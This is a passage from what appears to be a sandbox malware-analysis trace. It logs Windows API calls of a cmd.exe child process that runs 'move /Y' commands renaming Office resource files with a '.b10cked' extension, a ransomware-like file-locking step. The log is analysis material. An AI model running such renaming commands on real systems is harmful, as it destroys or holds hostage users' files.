(_String1="PUB6IN~2.TRX", _String2="..") returned 66 [0158.491] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6in~2.trx")) returned 0x2020 [0158.494] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x391f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.494] SetErrorMode (uMode=0x0) returned 0x0 [0158.494] SetErrorMode (uMode=0x1) returned 0x0 [0158.494] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX", nBufferLength=0x104, lpBuffer=0x1cf064, lpFilePart=0x1cf04c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX", lpFilePart=0x1cf04c*="PUB6IN~2.TRX") returned 0x3c [0158.494] SetErrorMode (uMode=0x0) returned 0x1 [0158.495] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0158.495] _wcsicmp (_String1="PUB6IN~2.TRX", _String2=".") returned 66 [0158.495] _wcsicmp (_String1="PUB6IN~2.TRX", _String2="..") returned 66 [0158.495] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6in~2.trx")) returned 0x2020 [0158.495] SetErrorMode (uMode=0x0) returned 0x0 [0158.495] SetErrorMode (uMode=0x1) returned 0x0 [0158.495] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX", nBufferLength=0x104, lpBuffer=0x1cf4e0, lpFilePart=0x1cf278 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX", lpFilePart=0x1cf278*="PUB6IN~2.TRX") returned 0x3c [0158.495] SetErrorMode (uMode=0x0) returned 0x1 [0158.495] SetErrorMode (uMode=0x0) returned 0x0 [0158.495] SetErrorMode (uMode=0x1) returned 0x0 [0158.495] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1cf6e8, lpFilePart=0x1cf278 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked", lpFilePart=0x1cf278*="PUB6INTL.REST.trx_dll.b10cked") returned 0x4d [0158.495] SetErrorMode (uMode=0x0) returned 0x1 [0158.496] SetLastError (dwErrCode=0x0) [0158.496] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6intl.rest.trx_dll.b10cked")) returned 0xffffffff [0158.496] GetLastError () returned 0x2 [0158.496] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x1cebf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cebf4) returned 0x392138 [0158.496] FindNextFileW (in: hFindFile=0x392138, lpFindFileData=0x1cebf4 | out: lpFindFileData=0x1cebf4) returned 0 [0158.497] GetLastError () returned 0x12 [0158.497] FindClose (in: hFindFile=0x392138 | out: hFindFile=0x392138) returned 1 [0158.498] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x391cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x391cc8) returned 0x392138 [0158.498] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1cee8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0158.498] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x1cee8c, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0158.498] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6intl.rest.trx_dll")) returned 0x2020 [0158.498] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6intl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6intl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0158.499] FindClose (in: hFindFile=0x392138 | out: hFindFile=0x392138) returned 1 [0158.499] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1cee40 | out: _Buffer=" 1") returned 9 [0158.499] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.499] GetFileType (hFile=0x7) returned 0x2 [0158.500] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0158.500] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cedcc | out: lpMode=0x1cedcc) returned 1 [0158.500] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.500] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1cee00 | out: lpConsoleScreenBufferInfo=0x1cee00) returned 1 [0158.500] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0158.501] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1cee40 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0158.501] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x1cee24, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cee24*=0x1a) returned 1 [0158.501] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.501] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.501] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.501] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.501] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.501] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.502] SetConsoleInputExeNameW () returned 0x1 [0158.502] GetConsoleOutputCP () returned 0x1b5 [0158.502] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.502] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.502] exit (_Code=0) Process: id = "267" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ac0" os_pid = "0x3c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21879 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21880 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21881 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21882 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 21883 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21884 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21885 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21886 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21887 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 21888 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21889 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21890 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21891 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21892 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 21893 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 21894 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21895 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21896 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21897 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21898 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21899 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21900 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21901 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21902 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21903 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 21904 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21905 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21906 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21907 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 21908 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 21909 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 21910 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 21911 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 21912 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000011b0000" filename = "" Thread: id = 330 os_tid = 0xff4 [0158.613] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fc34 | out: lpSystemTimeAsFileTime=0x24fc34*(dwLowDateTime=0x987871e0, dwHighDateTime=0x1d440a9)) [0158.613] GetCurrentProcessId () returned 0x3c4 [0158.613] GetCurrentThreadId () returned 0xff4 [0158.613] GetTickCount () returned 0x30878 [0158.613] QueryPerformanceCounter (in: lpPerformanceCount=0x24fc2c | out: lpPerformanceCount=0x24fc2c*=21540242435) returned 1 [0158.614] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0158.614] __set_app_type (_Type=0x1) [0158.614] __p__fmode () returned 0x76b331f4 [0158.614] __p__commode () returned 0x76b331fc [0158.614] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0158.615] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0158.615] GetCurrentThreadId () returned 0xff4 [0158.615] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xff4) returned 0x38 [0158.615] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.615] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0158.615] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.615] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0158.615] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fbc4 | out: phkResult=0x24fbc4*=0x0) returned 0x2 [0158.616] VirtualQuery (in: lpAddress=0x24fbfb, lpBuffer=0x24fb94, dwLength=0x1c | out: lpBuffer=0x24fb94*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.616] VirtualQuery (in: 
lpAddress=0x150000, lpBuffer=0x24fb94, dwLength=0x1c | out: lpBuffer=0x24fb94*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0158.616] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fb94, dwLength=0x1c | out: lpBuffer=0x24fb94*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0158.616] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fb94, dwLength=0x1c | out: lpBuffer=0x24fb94*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.616] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fb94, dwLength=0x1c | out: lpBuffer=0x24fb94*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0158.616] GetConsoleOutputCP () returned 0x1b5 [0158.616] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.616] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0158.616] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.616] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0158.617] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.617] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.617] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.617] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.617] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.617] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.617] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.617] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0158.618] GetEnvironmentStringsW () returned 0x2e0218* [0158.618] FreeEnvironmentStringsW 
(penv=0x2e0218) returned 1 [0158.618] GetEnvironmentStringsW () returned 0x2e0218* [0158.618] FreeEnvironmentStringsW (penv=0x2e0218) returned 1 [0158.618] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eb34 | out: phkResult=0x24eb34*=0x40) returned 0x0 [0158.618] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x0, lpData=0x24eb40*=0xa8, lpcbData=0x24eb38*=0x1000) returned 0x2 [0158.618] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x4, lpData=0x24eb40*=0x1, lpcbData=0x24eb38*=0x4) returned 0x0 [0158.618] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x0, lpData=0x24eb40*=0x1, lpcbData=0x24eb38*=0x1000) returned 0x2 [0158.618] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x4, lpData=0x24eb40*=0x0, lpcbData=0x24eb38*=0x4) returned 0x0 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x4, lpData=0x24eb40*=0x40, lpcbData=0x24eb38*=0x4) returned 0x0 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x4, lpData=0x24eb40*=0x40, lpcbData=0x24eb38*=0x4) returned 0x0 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x0, lpData=0x24eb40*=0x40, 
lpcbData=0x24eb38*=0x1000) returned 0x2 [0158.619] RegCloseKey (hKey=0x40) returned 0x0 [0158.619] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eb34 | out: phkResult=0x24eb34*=0x40) returned 0x0 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x0, lpData=0x24eb40*=0x40, lpcbData=0x24eb38*=0x1000) returned 0x2 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x4, lpData=0x24eb40*=0x1, lpcbData=0x24eb38*=0x4) returned 0x0 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x0, lpData=0x24eb40*=0x1, lpcbData=0x24eb38*=0x1000) returned 0x2 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x4, lpData=0x24eb40*=0x0, lpcbData=0x24eb38*=0x4) returned 0x0 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x4, lpData=0x24eb40*=0x9, lpcbData=0x24eb38*=0x4) returned 0x0 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x4, lpData=0x24eb40*=0x9, lpcbData=0x24eb38*=0x4) returned 0x0 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x0, lpData=0x24eb40*=0x9, lpcbData=0x24eb38*=0x1000) returned 0x2 [0158.619] RegCloseKey (hKey=0x40) 
returned 0x0 [0158.619] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886381 [0158.619] srand (_Seed=0x5b886381) [0158.619] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked\"" [0158.619] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked\"" [0158.620] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.620] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0158.620] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0158.620] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0158.620] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.620] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0158.620] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0158.620] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0158.621] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0158.621] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0158.621] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0158.621] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0158.621] 
_wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0158.621] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0158.621] GetEnvironmentStringsW () returned 0x2e2368* [0158.621] FreeEnvironmentStringsW (penv=0x2e2368) returned 1 [0158.621] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.621] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.621] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0158.621] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0158.621] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0158.621] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0158.621] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0158.621] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0158.621] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0158.621] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0158.622] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f900 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.623] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f900, lpFilePart=0x24f8fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f8fc*="Desktop") returned 0x18 [0158.623] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 